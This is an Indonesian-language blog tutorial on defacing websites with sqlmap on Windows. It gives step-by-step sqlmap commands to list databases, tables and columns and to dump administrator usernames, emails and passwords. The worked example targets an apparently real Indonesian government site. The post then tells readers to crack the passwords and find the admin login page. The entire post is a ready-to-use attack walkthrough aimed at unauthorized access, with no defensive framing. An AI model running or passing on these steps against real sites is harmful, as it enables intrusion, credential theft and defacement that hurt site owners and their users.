Cara Deface Dengan SQLMAP di Windows

Kang Karding - Cara Deface Dengan SQLMAP di Windows

• Alat Deface :
  • SQLMAP
  • Python
  • Google Dork 
• Yang pertama, ente install dulu Python nya, lalu taro file SQLMAP nya di C:/sqlmap
• Buka cmd, ente pergi ke direktori SQLMAP yang ada di C:/sqlmap tadi, dengan perintah > cd c:/sqlmap

• Lalu ketikkan perintah > sqlmap.py untuk menjalankan SQLMAP
• Perintah ini untuk melihat isi database > sqlmap.py -u http://target.com --dbs
  contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 --dbs

•  Nahh, ada 2 database di situs http://rosy.pom.go.id/

• Ane pilih database notifikasi, masukkan perintah > sqlmap.py -u http://target.com -D nama_db --tables
  contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 -D notifikasi --tables

• Ada 145 Tabel di dalam database notifikasi,

• Sekarang ente cari Tabel admin/user/auth/login atau yang lain, yang berhubungan dengan administrator.
  contoh : bpom_user

• ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel --column untuk melihat isi dari tabel.
  contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 -D notifikasi -T bpom_user --column

• Sekarang ente pilih field/kolom yang berisi data pending dari admin, seperti username,password,login,email,dll.

• Ketikkan perintah > sqlmap.py -u http://target.com -D nama_db -T nama_tabel -C kolom1,kolom2,kolom2,dst --dump untuk melihat isi dari kolom tersebut.
  contoh :> sqlmap.py -u http://rosy.pom.go.id/bpom-notifikasi/news.php?id=1 -D notifikasi -T bpom_user -C email,login,password,uploaded --dump

• Nahh udah dapet kan data nya? sekarang tinggal crack/decrypt passwordnya dan cari tempat loginnya.
  Baca juga : Cara Mencari Admin Login Page Dengan Script Perl

Oke, sekian dulu tutorial hari ini. Semoga dapat menambah ilmu sobat, terimakasih sudah berkunjung :)

Share :